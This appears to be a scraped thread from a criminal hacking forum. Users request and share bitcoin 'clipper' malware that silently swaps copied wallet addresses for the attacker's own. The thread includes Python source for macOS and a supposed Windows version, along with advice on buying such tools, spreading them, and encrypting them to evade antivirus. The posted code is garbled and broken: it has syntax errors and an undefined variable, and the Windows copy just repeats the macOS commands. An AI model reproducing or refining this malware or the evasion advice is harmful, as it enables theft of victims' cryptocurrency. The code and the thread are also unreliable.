Пожалуйста, обратите внимание, что пользователь заблокирован
Someone sends me a link to a good bitcoin stealer, that the antivirus does not detect. Thank you very much in advance.
Thanks for answering, I need the typical btc stealer, which makes the infected victim when copying a wallet to the clipboard, change it for my walletwhat do you need? Stealer file of cold wallet? Clipper?
It's called clipperneed the typical btc stealer, which makes the infected victim when copying a wallet to the clipboard
ty sirIt's called clipper
ty sirSimple python malware clipper
One people copy the bitcoin to their clipboard address for send so this script work when the BTC address hit the clipboard when they do it was replaced the address that copied in the clipboard with the new address
Macos script
import subprocess #pip install subprocess
yourBTC_address = b'YOUR BTC ADDRESS'
def get_clipboard():
p = subprocess.popen(['pbpaste']) , stdout=subprocess.PIPE)# for access the clipboard
data = str(s.stdout.read())#read data on clipboard on convert to string
if len(data) > 30: # we just suppose this bitcoin address
swap_address(data)
def swap_address(data):
p = subprocess.popen(['pbcopy']) , stdin=subprocess.PIPE)# access clipboard
p.stdin.write(yourBTC_address)
p.stdin.close()
while True:
get_clipboard()
-+-+-+-+-+-+-+-+-+-+--+-++--+-+-+-++--+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
For windows
import subprocess #pip install subprocess
yourBTC_address = b'YOUR BTC ADDRESS'
def get_clipboard():
p = subprocess.popen(['pbpaste']) , stdout=subprocess.PIPE)# for access the clipboard
data = str(s.stdout.read())#read data on clipboard on convert to string
if len(data) > 30: # we just suppose this bitcoin address
swap_address(data)
def swap_address(data):
p = subprocess.popen(['pbcopy']) , stdin=subprocess.PIPE)# access clipboard
p.stdin.write(yourBTC_address)
p.stdin.close()
while True:
get_clipboard()
Not made by me
The other day was that I discovered the software you sell, I have to work on a method of spreading it, and know a little better how your malware works, if you could give me some information I would appreciate it very much. I would like to buy it for you when I know how it works and spread it, thanks in advance, greetings.It's called clipper
Well done partner, if you want to share it with me and with those who read this post feel free to do so, I would appreciate it, I am learning, greetings.I can put a good clipper to work
I know friend, my fault for having written the thread before looking around the forum, now I have seen that there are enough things to test, thank you very much for answering sir, I am doing tests with the stormkitty, I configured a client but obviously I missing encryption, two questions:lol , a lot of clipper are around here , a maximum cost is $50-$70 ,most of them are developed in c# , if you find something written on c , it must be helpful , to bypass AV , just crypt it
what thing sir?i have something way better than clipper